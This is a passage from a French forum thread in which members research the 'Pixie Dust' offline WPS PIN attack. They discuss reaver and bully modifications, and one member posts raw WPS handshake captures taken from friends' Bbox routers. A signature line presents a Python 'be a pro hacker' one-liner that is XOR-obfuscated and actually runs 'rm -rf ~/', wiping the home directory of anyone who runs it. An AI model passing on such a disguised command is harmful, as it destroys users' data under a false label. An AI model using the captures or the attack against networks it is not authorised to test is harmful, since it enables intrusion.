Re : Pixie Dust attack : participez à la recherche avec vos échantillons !

Perso, je suis entrain de travailler sur la partie offline de l'attaque, un ticket est déjà ouvert sur le système de suivi de version de reaver, ils n'ont que quelques lignes de code a ajouter pour afficher toutes les informations nécessaires.
Je pense qu'il n'est pas nécessaire de s'y plonger trop, ils ont déjà tout ce qu'il faut.


@9b0ae3c4 méric.fr
be a pro hacker : python -c "exec ''.join([chr(ord(i)^0x46) for i in '/+6)42f)5}f)5h5?52#+nd4+fk4 f8ido'])"

Hors Ligne

#14 28-03-2015 10:47:04

kcdtv
Membre d'honneur
Lieu : Internacionaluña
Inscription : 31-03-2010
Messages : 4 246

Re : Pixie Dust attack : participez à la recherche avec vos échantillons !

Salut mon Spawn
Comment qu'c'est?
En effet, je pense que le ticket a été ouvert par sorcoxk112. En tout cas hier soir il avait commencé à apprendre C pour modifier le code de reaver et il avait réusit à obtenir au vol la auht-key et les deux e-hash assez vite.
J'ai pu essayer avec succès en utilisant un buly modifié mais bully est beaucoup trop rapide et sans options pour y aller avec un peu plus de doigté.
Reaver est mieux adapté.
il faudrait qu'il arrive à lancer un NACK immédiatement pour stoper après le M3, c'était l'autre mod importante à mettre en place
Je suis pas encore allé voir où il en été mais on s'est quitté vers 10 h de la nuit et il avait bien l'intention de continuer jusqu’à très tard (il est aux USA)
je posterais des news ce soir et les trois modèles connus vulnérabless
J'ai vu que des forums espagnols ont parlé du blak jack big_smile
2 + smile

Hors Ligne

#15 12-04-2015 22:21:11

t6_x
N00b
Inscription : 12-04-2015
Messages : 3

Re : Pixie Dust attack : participez à la recherche avec vos échantillons !

Hors Ligne

#16 15-04-2015 15:43:41

momomakK
Membre Actif
Inscription : 14-01-2014
Messages : 27

Re : Pixie Dust attack : participez à la recherche avec vos échantillons !

Salut, je suis en belge et j'ai des donné sagemcom,technicolor  (bbox3) si sa vous interresse dite le smile

une question soit pixiewps n'est pas au point ou soit mon wps n'est pas vulnérable ?, car malgré les donné
pixiewps ne retrouve pas le pin ?

merci , et grande progression lol

Ps : j'ai pu tester sur un linksis sa marche nickel

Hors Ligne

#17 17-05-2015 02:25:13

Kill -9
N00b
Inscription : 14-05-2015
Messages : 3

Re : Pixie Dust attack : participez à la recherche avec vos échantillons !

C'est exactement le script qu'il me fallait !

Je te remercie vraiment.

Tiens c'est cadeau ,  les deux sont des Bbox.
Par contre j'ai pas plus d'infos, les deus sont à des amis, donc j'ai pas plus d'infos.

M1  wps.enrollee_nonce        : 2ca39a53658e915c12481806b2fdb113
M2  wps.enrollee_nonce        : 2ca39a53658e915c12481806b2fdb113
M2  wps.registrar_nonce       : 81f753a61cb8bb032e0655bf663c7ddc
M2  wps.authenticator         : abb855b800fa7623
M3  wps.registrar_nonce       : 81f753a61cb8bb032e0655bf663c7ddc
M3  wps.authenticator         : ddf9f639c921b041
M3  wps.e_hash1               : 641a26b21f69250d5d71c0140e50d4cad3488a657d7979a12712c5d2f462640c
M3  wps.e_hash2               : b7894e9175a1fe2c310985871468638368749d7c4eebb738320f9b0e4b1be5ca
M4  wps.enrollee_nonce        : 2ca39a53658e915c12481806b2fdb113
M4  wps.authenticator         : 0984cbb285ca8ba5
M4  wps.encrypted_settings    : d7e62a73968ca8574c95619f3ff938310d446f1ffeb55402adae4937273b44277c380662810774812e8bbc0e951b933362bf0cd87a09e839058940a6e58a4b10
M4  wps.r_hash1               : 149f77e06be554f51d7432bf4ddea5f1d58d66189f4aad4f633877b8eaf37fc8
M4  wps.r_hash2               : 917d923859967c224efb17a99613198409c2cc8d11653cb154faeca37d782e9b
M5  wps.registrar_nonce       : 81f753a61cb8bb032e0655bf663c7ddc
M5  wps.authenticator         : 45c10894816afb50
M5  wps.encrypted_settings    : ff9e97b96b616bf0155a3bd21ac49aa7f99d661043e540b4ec1d557c3dba76d71ab2a262e0d1171b8d211f077a31e68817cc03b13188901a0bc3d5eaca5ad64f
M6  wps.enrollee_nonce        : 2ca39a53658e915c12481806b2fdb113
M6  wps.authenticator         : 8fcd873e65729df7
M6  wps.encrypted_settings    : c83e48ad5d7973b9db1dcc059496704955dc254ae6507f31b4a1307ed01e55b96104bfab97ccb2628e55385544561874912c6affcccd65cb8a05dbc3d9ce7beb
M7  wps.registrar_nonce       : 81f753a61cb8bb032e0655bf663c7ddc
M7  wps.authenticator         : 99d80bec8bb2872d
M7  wps.encrypted_settings    : 6741db1c0e15ccc7c7cba4cc0e30d8b20133b473b697a68a32dadc96aa2a361d00b11a9c0dd051edbcd880ea06bd065d3ca93c7873842c4577198068f3d3ae2f835499a4104a02ae5ee688bba9ce105e87962130bdb7734d6800b1de82e63d4f546765164539c843c29980479d4e23a76e35a5c18a89f4fd9fb089b9b99fba3d
Client wps.manufacturer   : 
Client wps.device_name    : 
Client wps.os_version     : 0x80000000
Client wlan.ta            : 00:c0:ca:7f:0f:0f
Client wps.model_name     : 
Client wps.model_number   : 
Client wps.serial_number  : 
AP wps.manufacturer       : Celeno Communication, Inc.
AP wps.device_name        : CelenoAP2.4G
AP wps.os_version         : 0x80000000
AP wlan.ta                : 64:7c:34:18:b9:fc
AP wps.model_name         : Celeno Wireless AP 2.4G
AP wps.model_number       : CL1800
AP wps.serial_number      : 12345678

==============================================================


M1  wps.enrollee_nonce        : 4404f1692395a452d87b948a5d83bbd0
M2  wps.enrollee_nonce        : 4404f1692395a452d87b948a5d83bbd0
M2  wps.registrar_nonce       : d8434d61694a8f56620b5bc51a875af2
M2  wps.authenticator         : ea2445ff2a4b75be
M3  wps.registrar_nonce       : d8434d61694a8f56620b5bc51a875af2
M3  wps.authenticator         : f6cfe0f0aeca170c
M3  wps.e_hash1               : 51b5d45553f7e5371c4809fcf5661f383e6cfd6145fd50f7767bbcb724926529
M3  wps.e_hash2               : 5e6bf18bcf1598625486a49f5cb1f526681a747da5dfca6ccfb6dad54a5234d7
M4  wps.enrollee_nonce        : 4404f1692395a452d87b948a5d83bbd0
M4  wps.authenticator         : 3b12d3f95fb008cd
M4  wps.encrypted_settings    : 1ea97d45ae479b5cc0db912721ac58ceae46ba9279c19ec2e5ba4fb2123e4d89fc6cf6d48e6451dfd42c2b0a983a789dac7f88ad2e95b73d0bec1e5db17fab44
M4  wps.r_hash1               : 75729cedec2a25045cd8a187305365a6cff1094b48d2113a2fcebc4184c67af9
M4  wps.r_hash2               : 7f868ea0c4d54a3bd201f4fb016cfd47bfce16edbd8c21490cda5d1ec2c30cb7
M5  wps.registrar_nonce       : d8434d61694a8f56620b5bc51a875af2
M5  wps.authenticator         : 86f02f675e8d9ec5
M5  wps.encrypted_settings    : e7b588ea8a3bd1ca616b9da964d4e72a80946475f01ffa0da4c3e6e95e3eec8f3bd96e95f2ada5291207c3a75b1bb3430e9e034e0ac501f898f3e7d7a97d6e22
M6  wps.enrollee_nonce        : 4404f1692395a452d87b948a5d83bbd0
M6  wps.authenticator         : eee087909dc47a3f
M6  wps.encrypted_settings    : f8bfbe0991ba4ce4abd037595f09bedffb35b961a23c1fa4a6ca29ebcd672d44ad44b98b23ecc72fa9484ac996d2e351fc0bbf86d778bd3b47e18af5fd59fe50
M7  wps.registrar_nonce       : d8434d61694a8f56620b5bc51a875af2
M7  wps.authenticator         : 0ba74fdeb56324f4
M7  wps.encrypted_settings    : 42e528f9ed4622d22471c5212516f96409d74666e692f9946f0634e2ca5a205e26d8559772cce13591c7da972372d313147c7ece147727f6edd98ef1a532f996347c346ab02b92b7e2d4d2295bff7d256cd9bbf4e59f04befde654e4f21d69e6ebd3b6d7a3fd52a5f949d6d93b2a0f85ea9de6c8b9625f547b42e59c8159caf2
Client wps.manufacturer   : 
Client wps.device_name    : 
Client wps.os_version     : 0x80000000
Client wlan.ta            : 00:c0:ca:7f:0f:0f
Client wps.model_name     : 
Client wps.model_number   : 
Client wps.serial_number  : 
AP wps.manufacturer       : Celeno Communication, Inc.
AP wps.device_name        : CelenoAP2.4G
AP wps.os_version         : 0x80000000
AP wlan.ta                : 64:7c:34:27:18:4c
AP wps.model_name         : Celeno Wireless AP 2.4G
AP wps.model_number       : CL1800
AP wps.serial_number      : 12345678

Kill -9.

Hors Ligne

Annonce

Visitez la boutique Wifi-highpower.com, votre revendeur agr Alfa Network: du matriel Wifi slectionn, cartes Wifi USB Awus036h et Awus036nh, antennes omnis, yagis, panel, amplis wifi, accessoires...

Sujets similaires

Discussion Réponses Vues Dernier message
0 21 Aujourd'hui 21:32:19 par tit64
4 308 20-11-2016 14:31:08 par richie
Épinglée :
21 14668 20-11-2016 12:53:07 par richie
Routeur avec antenne amovible par le flibustier
0 228 07-11-2016 19:12:24 par le flibustier
0 158 29-10-2016 11:12:05 par sukawa2007

Pied de page des forums


Le coin des bonnes affaires, achats informatiques:


|   Alfa 1000 mW AWUS036H   |    Linksys WRT54GL   |    Misco, informatique   |   
 |    Ebay   |    PC portables   |    PC Gamers & Tuning   |    Cles USB   |   
|   Disques durs externes 2 To   |   
|   Wifi-highpower.com   |   


Server Stats - [ Generated in 0.033 seconds ]   Forum Stat - [ Most users ever online on the forum was : 150 on 20-09-2009 17:06:59 ]